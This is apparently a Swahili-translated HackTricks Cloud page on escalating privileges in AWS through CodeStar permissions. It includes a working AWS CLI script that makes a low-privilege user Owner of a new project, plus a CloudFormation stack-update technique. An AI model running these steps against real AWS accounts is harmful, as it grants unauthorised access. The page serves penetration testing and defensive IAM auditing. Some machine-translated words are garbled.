AWS - Codestar Privesc

Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya HackTricks AWS)!

Njia nyingine za kusaidia HackTricks:

Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA KUJIUNGA!
Pata bidhaa rasmi za PEASS & HackTricks
Gundua Familia ya PEASS, mkusanyiko wetu wa NFTs za kipekee
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Codestar

Unaweza kupata habari zaidi kuhusu codestar katika:

pagecodestar:CreateProject, codestar:AssociateTeamMember

`iam:PassRole`, `codestar:CreateProject`

Kwa ruhusa hizi unaweza kutumia jukumu la IAM la codestar kufanya vitendo vya kupindukia kupitia template ya cloudformation. Angalia ukurasa ufuatao:

pageiam:PassRole, codestar:CreateProject

`codestar:CreateProject`, `codestar:AssociateTeamMember`

Mbinu hii inatumia codestar:CreateProject kuunda mradi wa codestar, na codestar:AssociateTeamMember kumfanya mtumiaji wa IAM awe mmiliki wa mradi mpya wa CodeStar, ambao utawapa sera mpya na ruhusa chache ziada.

PROJECT_NAME="supercodestar"

aws --profile "$NON_PRIV_PROFILE_USER" codestar create-project \
--name $PROJECT_NAME \
--id $PROJECT_NAME

echo "Waiting 1min to start the project"
sleep 60

USER_ARN=$(aws --profile "$NON_PRIV_PROFILE_USER" opsworks describe-my-user-profile | jq .UserProfile.IamUserArn | tr -d '"')

aws --profile "$NON_PRIV_PROFILE_USER" codestar associate-team-member \
--project-id $PROJECT_NAME \
--user-arn "$USER_ARN" \
--project-role "Owner" \
--remote-access-allowed

Ikiwa tayari ni mwanachama wa mradi unaweza kutumia ruhusa codestar:UpdateTeamMember kuboresha jukumu lako kuwa mmiliki badala ya codestar:AssociateTeamMember

Athari Inayowezekana: Privesc kwa sera ya codestar iliyoundwa. Unaweza kupata mfano wa sera hiyo katika:

pagecodestar:CreateProject, codestar:AssociateTeamMember

`codestar:CreateProjectFromTemplate`

Unda Mradi Mpya:

Tumia hatua ya codestar:CreateProjectFromTemplate kuanzisha uundaji wa mradi mpya.
Baada ya uundaji mafanikio, ufikiaji unatolewa moja kwa moja kwa cloudformation:UpdateStack.
Ufikiaji huu unalenga hasa stakli inayohusiana na jukumu la IAM CodeStarWorker-<jina la mradi la kawaida>-CloudFormation.

Sasisha Stakilililolengwa:

Ukiwa na ruhusa za CloudFormation zilizotolewa, endelea kusasisha stakli iliyotajwa.
Jina la stakli kawaida litafuata mojawapo ya mifano miwili:
awscodestar-<jina la mradi la kawaida>-miundombinu
awscodestar-<jina la mradi la kawaida>-lambda
Jina kamili linategemea templeti iliyochaguliwa (kurejelea skripti ya kudanganya mfano).

Fikia na Ruhusa:

Baada ya kusasisha, unapata uwezo uliopewa jukumu la IAM la CloudFormation linalohusishwa na stakli.
Tafadhali kumbuka: Hii haipati moja kwa moja ruhusa kamili za msimamizi. Rasilimali zingine zilizopangwa vibaya ndani ya mazingira zinaweza kuhitajika kuinua ruhusa zaidi.

Kwa habari zaidi angalia utafiti wa awali: https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/. Unaweza kupata udanganyifu huo katika https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py

Athari Inayowezekana: Privesc kwa jukumu la IAM la cloudformation.

PreviousAWS - Codepipeline Privesc Nextcodestar:CreateProject, codestar:AssociateTeamMember

Last updated 2 months ago